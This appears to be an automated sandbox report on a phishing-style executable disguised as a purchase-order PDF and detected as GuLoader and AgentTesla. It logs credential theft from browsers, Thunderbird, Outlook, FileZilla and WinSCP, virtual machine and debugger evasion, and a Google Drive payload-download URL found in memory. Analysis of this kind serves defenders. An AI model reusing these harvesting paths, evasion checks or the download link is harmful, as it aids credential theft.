Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File created: C:\Users\user\AppData\Roaming\frpuodz4.bqm

Jump to behavior

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7DBC0B9955D431E2.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/4@3/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 0000000A.00000000.101282349186.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.101469724923.0000000002D80000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Code function: 2_2_00408C44 push ebp; ret
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Code function: 2_2_0040686F pushad ; ret
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Code function: 2_2_004078FD push ebx; ret
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Code function: 2_2_004055C1 push ds; ret
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Code function: 2_2_00409198 push edx; retf
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Code function: 2_2_0040970C push ebp; iretd
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Code function: 2_2_0040733E pushfd ; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E64B97 push edi; retn 0000h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 10_2_00E6C762 push ds; ret

Source: initial sample

Static PE information: section name: .text entropy: 7.13735500913

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	File created: \210629 purchase order 449 burghausen (uz 20-270)_pdf.exe
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	File created: \210629 purchase order 449 burghausen (uz 20-270)_pdf.exe
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	File created: \210629 purchase order 449 burghausen (uz 20-270)_pdf.exe
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	File created: \210629 purchase order 449 burghausen (uz 20-270)_pdf.exe

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: CasPol.exe, 0000000A.00000002.105876042787.0000000000DC0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1SW9PADFHXH64IJ3XW0UAFAPSES7O-X1G
Source: CasPol.exe, 0000000A.00000002.105876042787.0000000000DC0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7164

Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9949

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

System information queried: ModuleInformation

Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe, 00000002.00000002.101470063799.0000000005009000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe, 00000002.00000002.101470063799.0000000005009000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe, 00000002.00000002.101470063799.0000000005009000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 0000000A.00000002.105876042787.0000000000DC0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe, 00000002.00000002.101470063799.0000000005009000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe, 00000002.00000002.101470063799.0000000005009000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 0000000A.00000002.105875208119.0000000000BF9000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 0000000A.00000002.105876042787.0000000000DC0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe, 00000002.00000002.101470063799.0000000005009000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe, 00000002.00000002.101470063799.0000000005009000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 0000000A.00000002.105874544943.0000000000B7B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe, 00000002.00000002.101470063799.0000000005009000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 0000000A.00000002.105877713405.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 10_2_007199D0 LdrInitializeThunk,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe"
Source: C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe"

Source: CasPol.exe, 0000000A.00000002.105877266492.0000000001570000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 0000000A.00000002.105877266492.0000000001570000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: CasPol.exe, 0000000A.00000002.105877266492.0000000001570000.00000002.00020000.sdmp	Binary or memory string: 5Program ManagerJt
Source: CasPol.exe, 0000000A.00000002.105877266492.0000000001570000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000A.00000002.105886078369.000000001DB80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 2268, type: MEMORYSTR

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

Source: Yara match	File source: 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 2268, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000A.00000002.105886078369.000000001DB80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 2268, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping2	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection12	Deobfuscate/Decode Files or Information1	Input Capture11	System Information Discovery115	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Credentials in Registry1	Security Software Discovery421	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
